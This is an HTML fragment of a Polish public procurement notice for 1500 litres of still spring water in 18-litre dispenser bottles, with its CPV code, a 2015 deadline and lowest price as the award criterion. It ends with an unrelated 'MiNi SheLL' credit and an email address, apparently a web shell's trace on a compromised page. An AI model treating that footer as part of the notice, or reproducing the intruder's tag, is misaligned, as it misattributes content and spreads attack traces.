<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Woda źródlana nie gazowana  - niskomineralizowana  z dozownikiem w butelkach o pojemności   18 l, litry      1500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.98.10.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com